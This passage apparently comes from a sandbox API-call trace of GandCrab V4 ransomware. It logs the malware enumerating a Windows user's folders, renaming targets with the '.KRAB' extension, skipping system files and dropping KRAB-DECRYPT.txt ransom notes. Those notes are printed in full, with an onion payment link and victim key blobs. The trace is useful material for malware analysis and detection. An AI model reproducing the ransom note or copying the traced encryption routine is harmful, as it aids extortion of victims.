5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.409] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.410] CloseHandle (hObject=0x3a8) returned 1 [0091.410] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.410] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.411] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x25c)) [0091.411] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.411] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.411] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.411] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock") returned 74 [0091.411] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\_private\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0091.413] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.423] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\") returned 51 [0091.424] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*" [0091.424] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd2a0 [0091.424] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.424] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.424] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.424] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.424] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.424] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0091.424] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0091.424] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock" [0091.424] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.425] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 79 [0091.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a08d2ca4dee3d.lock") returned 74 [0091.425] lstrlenW (lpString=".lock") returned 5 [0091.425] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.425] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0091.425] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.425] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.426] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.426] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1 [0091.426] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1 [0091.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="folder.ico" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico" [0091.427] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.427] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico.KRAB") returned 66 [0091.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico") returned 61 [0091.428] lstrlenW (lpString=".ico") returned 4 [0091.428] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.434] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ico ") returned 5 [0091.434] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.434] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.435] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.435] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.435] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.435] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt" [0091.435] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.435] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt.KRAB") returned 72 [0091.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt") returned 67 [0091.435] lstrlenW (lpString=".txt") returned 4 [0091.435] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.436] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.436] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.436] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt") returned 67 [0091.436] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\KRAB-DECRYPT.txt") returned 67 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.436] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.437] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0091.437] FindClose (in: hFindFile=0xfbd2a0 | out: hFindFile=0xfbd2a0) returned 1 [0091.437] CloseHandle (hObject=0x3a8) returned 1 [0091.437] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0091.437] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0091.437] CloseHandle (hObject=0x434) returned 1 [0091.437] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.437] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0091.438] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0091.438] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos" [0091.438] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\" [0091.438] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.438] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.438] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.438] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.438] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.438] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.438] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.439] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\\\KRAB-DECRYPT.txt") returned 59 [0091.439] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.440] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.440] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.443] CloseHandle (hObject=0x434) returned 1 [0091.446] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.447] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.447] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x28b)) [0091.447] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.447] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.447] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.448] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock") returned 65 [0091.448] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.449] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.449] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\") returned 42 [0091.449] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*" [0091.449] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0091.450] CloseHandle (hObject=0x434) returned 1 [0091.450] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.450] lstrcmpW (lpString1="OneNote Notebooks", lpString2=".") returned 1 [0091.450] lstrcmpW (lpString1="OneNote Notebooks", lpString2="..") returned 1 [0091.450] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="OneNote Notebooks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks" [0091.450] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\" [0091.450] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.450] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.450] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.450] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.450] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.450] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.451] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.451] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\\\KRAB-DECRYPT.txt") returned 67 [0091.451] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.453] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFc